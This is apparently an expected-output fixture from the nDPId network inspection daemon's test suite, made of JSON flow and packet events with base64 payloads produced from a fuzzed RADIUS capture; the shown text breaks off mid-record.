00231{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":84,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":205,"global_ts_msec":1528997104799} 00217{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":84,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":205,"global_ts_msec":1528997104799}
00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":86,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997105304,"flow_last_seen":1528997105304,"flow_idle_time":600000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":0,"thread_ts_msec":1528997105304,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","l4_proto":88,"flow_datalink":1,"flow_max_packets":3} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":86,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997105304,"flow_last_seen":1528997105304,"flow_idle_time":600000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":0,"thread_ts_msec":1528997105304,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","l4_proto":88,"flow_datalink":1,"flow_max_packets":3}
00823{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1528997105304,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":318,"pkt_l4_len":284,"thread_ts_msec":1528997105304,"pkt":"ABRP+4rqcNuYVcUnCABFAAEw\/QtAAPxYVm\/G4hk1CgxAHgcUchABHIJZAjUBFIVrGSOS1oLndVnFKVWnbGoaCwAAV8gbBVNQQxpuAAABNxA068q45YUN\/fhrVdP8LBtW4SmALFtdsWb5hs7\/8\/9n5+eq0Df0PkMMbrFhe6mwiqYImFERNLWmv3lBPH8LOa+rokyY3FJkdnDDQhSYNRCrOtMioCo5aXrsAAJ6j7Kc6YNqYGU8UqSvASgwMzExNDgwMDczUjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhNGYwL2YwOjc5OjYwOmQxOjdkOlk3LzIxOFkMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBJMzhShZ173Q9M6eXZ8hQzE"} 00823{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1528997105304,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":318,"pkt_l4_len":284,"thread_ts_msec":1528997105304,"pkt":"ABRP+4rqcNuYVcUnCABFAAEw\/QtAAPxYVm\/G4hk1CgxAHgcUchABHIJZAjUBFIVrGSOS1oLndVnFKVWnbGoaCwAAV8gbBVNQQxpuAAABNxA068q45YUN\/fhrVdP8LBtW4SmALFtdsWb5hs7\/8\/9n5+eq0Df0PkMMbrFhe6mwiqYImFERNLWmv3lBPH8LOa+rokyY3FJkdnDDQhSYNRCrOtMioCo5aXrsAAJ6j7Kc6YNqYGU8UqSvASgwMzExNDgwMDczUjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhNGYwL2YwOjc5OjYwOmQxOjdkOlk3LzIxOFkMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBJMzhShZ173Q9M6eXZ8hQzE"}
00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997109583,"flow_last_seen":1528997109583,"flow_idle_time":600000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"thread_ts_msec":1528997109583,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":254,"flow_datalink":1,"flow_max_packets":3} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997109583,"flow_last_seen":1528997109583,"flow_idle_time":600000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"thread_ts_msec":1528997109583,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":254,"flow_datalink":1,"flow_max_packets":3}
01365{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1528997109583,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528997109583,"pkt":"AAAMB6xAABRP+4rqCABFAALHIPFAAP\/+AAAKDEAexuIZNXIQBxQCswAAATcCq5VZOX5pbnkbLCYZ0nqbgzoaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMwNwZbIqT1ATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZnBwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwY2JmMGE0MjI1YiwgNWIyMmE0ZjAvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjE4BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkFwEAAAsFcwD\/DNAuaveCVbGDkVIwd1IcAwIAIASFDyEaFAAAV8gHDlZaV0MyVGVzdExhYhoKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaEQAAV8gRC0x5bmRodXJzdBoMAABXiBIGAAAAyRoXAABXUR0RVlpXIEMyIFRlc3QgTGFiGgsAAFdrJQVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhbHVlGh0AADghExc0MC44MDQ4ODJOLTc0LjEwMjgzOVcaDAByOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW1EaXJlJQAaDAAABYMHBsBQSplQElS\/ahHMEatmlfMLiyrCF7k="} 01365{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1528997109583,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528997109583,"pkt":"AAAMB6xAABRP+4rqCABFAALHIPFAAP\/+AAAKDEAexuIZNXIQBxQCswAAATcCq5VZOX5pbnkbLCYZ0nqbgzoaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMwNwZbIqT1ATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZnBwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwY2JmMGE0MjI1YiwgNWIyMmE0ZjAvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjE4BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkFwEAAAsFcwD\/DNAuaveCVbGDkVIwd1IcAwIAIASFDyEaFAAAV8gHDlZaV0MyVGVzdExhYhoKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaEQAAV8gRC0x5bmRodXJzdBoMAABXiBIGAAAAyRoXAABXUR0RVlpXIEMyIFRlc3QgTGFiGgsAAFdrJQVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhbHVlGh0AADghExc0MC44MDQ4ODJOLTc0LjEwMjgzOVcaDAByOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW1EaXJlJQAaDAAABYMHBsBQSplQElS\/ahHMEatmlfMLiyrCF7k="}
00622{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":92,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":239,"pkt_l4_len":0,"thread_ts_msec":1528997113424,"pkt":"ABRP+4rqcNuYVcUnCABFAAvh\/SZAAPwRVqNv4hk1CgxAHgcUchAAzU+kCzgAxaY+TEQIBvIbEM8gxwm8HiEBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNSUAMmE0ZjBKZjA6Nzk6NjA6ZDE6N2Q6MzcvMjE4T0oBAgBIFwEAAAEFAADPr1+7vG3\/htCZ9485+1faAgUAAJ17h25JOQAAmA0tC\/t4G7mLAQACCwUAAM8TNgqzvAoBwPCLdirLFOVQEinOKpiYJ1ox0+WTuvuhy58="} 00608{"packet_event_id":1,"packet_event_name":"packet","packet_id":92,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":239,"pkt_l4_len":0,"thread_ts_msec":1528997113424,"pkt":"ABRP+4rqcNuYVcUnCABFAAvh\/SZAAPwRVqNv4hk1CgxAHgcUchAAzU+kCzgAxaY+TEQIBvIbEM8gxwm8HiEBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNSUAMmE0ZjBKZjA6Nzk6NjA6ZDE6N2Q6MzcvMjE4T0oBAgBIFwEAAAEFAADPr1+7vG3\/htCZ9485+1faAgUAAJ17h25JOQAAmA0tC\/t4G7mLAQACCwUAAM8TNgqzvAoBwPCLdirLFOVQEinOKpiYJ1ox0+WTuvuhy58="}
00231{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":92,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":205,"global_ts_msec":1528997113631} 00217{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":92,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":205,"global_ts_msec":1528997113631}
01297{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":95,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2100,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997114153,"pkt":"AAAMB6xAABRP+4rqCDRFAALbIPRAAP8RAAAKDEAexnIZNXIQBxQCxwAAAToCv+vfrufmnhCXLUg\/JVwSV1oaCkAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMzNwZbIqUNATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTA+OlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zEXNzaW9uLWlkPTEwZiUAMGFjMDAwMDAwYmJmMGE0MjI1YiwgNWIyMmE0ZjAvZjA6N7s6NjA6ZDE6N2Q6MzcvMjE4BAasNAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgEAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzNTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjM14xLjNncHBuZXR3b3JrLm9yZxoUIABXyAcOVlpXQzJUZXMtTGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoBABBXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBNYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQEAOCESD0ludmFsaWQgVmFsdWUaHQAAOMQTFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcuVjdBoMAAAFgwcGwFBKmVASGDIZZLp6RfMCK\/1DfUENrQ=="} 01283{"packet_event_id":1,"packet_event_name":"packet","packet_id":95,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2100,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997114153,"pkt":"AAAMB6xAABRP+4rqCDRFAALbIPRAAP8RAAAKDEAexnIZNXIQBxQCxwAAAToCv+vfrufmnhCXLUg\/JVwSV1oaCkAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMzNwZbIqUNATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTA+OlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zEXNzaW9uLWlkPTEwZiUAMGFjMDAwMDAwYmJmMGE0MjI1YiwgNWIyMmE0ZjAvZjA6N7s6NjA6ZDE6N2Q6MzcvMjE4BAasNAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgEAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzNTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjM14xLjNncHBuZXR3b3JrLm9yZxoUIABXyAcOVlpXQzJUZXMtTGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoBABBXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBNYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQEAOCESD0ludmFsaWQgVmFsdWUaHQAAOMQTFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcuVjdBoMAAAFgwcGwFBKmVASGDIZZLp6RfMCK\/1DfUENrQ=="}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":95,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":2100,"global_ts_msec":1528997133564} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":95,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":2100,"global_ts_msec":1528997133564}
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997134036,"flow_last_seen":1528997134036,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997134036,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.120.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997134036,"flow_last_seen":1528997134036,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997134036,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.120.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1528997134036,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997134036,"pkt":"ABxP+4rqcNuYVcUnCABFAADh\/WZAAPsRV2PG4hk1Cgx4HgcUchAAzWYuCzpCxXGn0Uh9HQ+OyLOqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1528997134036,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997134036,"pkt":"ABxP+4rqcNuYVcUnCABFAADh\/WZAAPsRV2PG4hk1Cgx4HgcUchAAzWYuCzpCxXGn0Uh9HQ+OyLOqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997212627,"flow_last_seen":1528997212627,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997212627,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"206.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997212627,"flow_last_seen":1528997212627,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997212627,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"206.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
01390{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1528997212627,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997212627,"pkt":"AAAMB6xAABRP+4p2CABFAALbIPZAAP8RAAAKDEAezuIZNXIQBxQCxwAAATwCvzm9iAIIk1e98ZWWJBeuNcEaCgAAV8gOBCUAGgwAAFfIDQZ3aWZpJQAAAFfICQlXSVNQUjEwGgkAADghDQMxNwZbIqVcATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQUNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYmM0OWE1MjI1YiwgNWIyMmE1NDlOZjA6Nzk6NjA6ZDE6N2Q6MzcvMjE5BgasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAQwIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCHAA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGglqAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 01390{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1528997212627,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997212627,"pkt":"AAAMB6xAABRP+4p2CABFAALbIPZAAP8RAAAKDEAezuIZNXIQBxQCxwAAATwCvzm9iAIIk1e98ZWWJBeuNcEaCgAAV8gOBCUAGgwAAFfIDQZ3aWZpJQAAAFfICQlXSVNQUjEwGgkAADghDQMxNwZbIqVcATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQUNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYmM0OWE1MjI1YiwgNWIyMmE1NDlOZjA6Nzk6NjA6ZDE6N2Q6MzcvMjE5BgasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAQwIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCHAA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGglqAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997212627,"flow_last_seen":1528997212627,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997212627,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"206.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997212627,"flow_last_seen":1528997212627,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997212627,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"206.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
01268{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":105,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":3072,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997217103,"pkt":"AAAMB6xAABRP+4rqDABFAALHIPlAAP8RAAAKDEAexuIZNXIQBxQCswAAAT8Cqw8xhdF672TCSWbkw5Hj930aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMxNwZbIqVhATUwMzFJNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3Bwbld0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LeoyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmZxMGFjMDAwMDAwYmM0OWE1MjI1YiwgNWIyMmE1NDkvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjE5BAasFAEQIA5WWldDMlRlc3RMYWIaWAAAN2MBBgAAAAIGBgAAAAIMBgAABUM9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAnIkFwEAAAsFAADyEldFerwQeByQ1kXOElNqAwIAILdGopoaFAAAV8gHDlZaV0MyVGVzdExhYhoKAABXyGQERVQaEAAAV8gKClN0YW5kYXJkGhBmAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoacAAAV8gRC0x5dGRodXJzdBoMAABX